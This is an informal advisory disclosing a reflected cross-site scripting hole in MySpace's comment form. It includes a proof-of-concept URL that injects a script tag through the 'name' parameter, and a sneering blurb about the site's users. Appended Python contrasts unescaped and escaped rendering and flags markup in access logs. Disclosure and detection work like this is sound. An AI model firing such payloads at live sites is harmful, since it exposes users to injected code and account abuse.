MySpace.com - XSS hole
----------------------

Desc: There's an XSS hole in MySpace.com

Risk: Medium to High (can be used to include malicious code)

Discovered by: dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk

Site blurb: Myspace.com is another one of those crappy community sites for cam whores/scene kids/emo kids/goths/generic fools. If you haven't heard of it then you must have been hiding under a rock for the past few years.

Hole description: The hole is in the add comment function (the name parameter of the comment form URL is reflected into the page). For this to work you must be logged in and have a valid friendID.

Screenshot: http://0xdeadface.co.uk/myspace_xss.JPG

URL:
http://www.myspace.com/index.cfm?fuseaction=user&circuitaction=viewProfile_commentForm&friendID=[7-char-friend-id]&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E

I have been able to confirm that this can be used for the inclusion of code (got any 0day IE exploits?)

Hugs & Kisses
dyn0/codeslag

"When it came to throw brick through that starbucks window you left me all alone." - Against Me
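The reflected-XSS pattern behind this advisory, as an added example (not code from MySpace or from the advisory's author): the comment form echoes the name parameter into the page, so the unescaped rendering is shown beside the escaped one, and a small log check flags requests whose decoded name parameter carries markup. The friendID value and the access-log lines are constructed; the query-string handling is a hypothetical stand-in for whatever the real index.cfm did.

```python
from html import escape
from urllib.parse import urlsplit, unquote_plus

# The advisory's URL with a constructed 7-digit friendID in place of the placeholder.
ADVISORY_URL = ("http://www.myspace.com/index.cfm?fuseaction=user"
                "&circuitaction=viewProfile_commentForm&friendID=1234567"
                "&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E")

def query_params(url):
    """Decode the query string into a dict (split on '&' only, so ';' stays in values)."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def render_vulnerable(name):
    """Mirrors the bug: the decoded parameter is dropped into HTML unchanged."""
    return "<p>Leave a comment for " + name + "</p>"

def render_fixed(name):
    """Hardened form: HTML-escape the value (quotes too) before it reaches the page."""
    return "<p>Leave a comment for " + escape(name, quote=True) + "</p>"

# Constructed access-log lines: one ordinary request, one carrying the advisory payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2006:12:00:00 +0000] "GET /index.cfm?fuseaction=user'
    '&circuitaction=viewProfile_commentForm&friendID=1234567&name=Bob HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2006:12:00:05 +0000] "GET /index.cfm?fuseaction=user'
    '&circuitaction=viewProfile_commentForm&friendID=1234567'
    '&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E HTTP/1.1" 200 512',
]

def flagged_requests(log_lines):
    """Return (client_ip, decoded name) for requests whose name parameter holds markup."""
    hits = []
    for line in log_lines:
        ip = line.split(" ", 1)[0]
        path = line.split('"GET ', 1)[1].split(" HTTP/", 1)[0]
        name = query_params("http://host" + path).get("name", "")
        if "<" in name or ">" in name:
            hits.append((ip, name))
    return hits

if __name__ == "__main__":
    payload = query_params(ADVISORY_URL)["name"]
    print("vulnerable:", render_vulnerable(payload))
    print("fixed:     ", render_fixed(payload))
    print("flagged:   ", flagged_requests(SAMPLE_LOG))
```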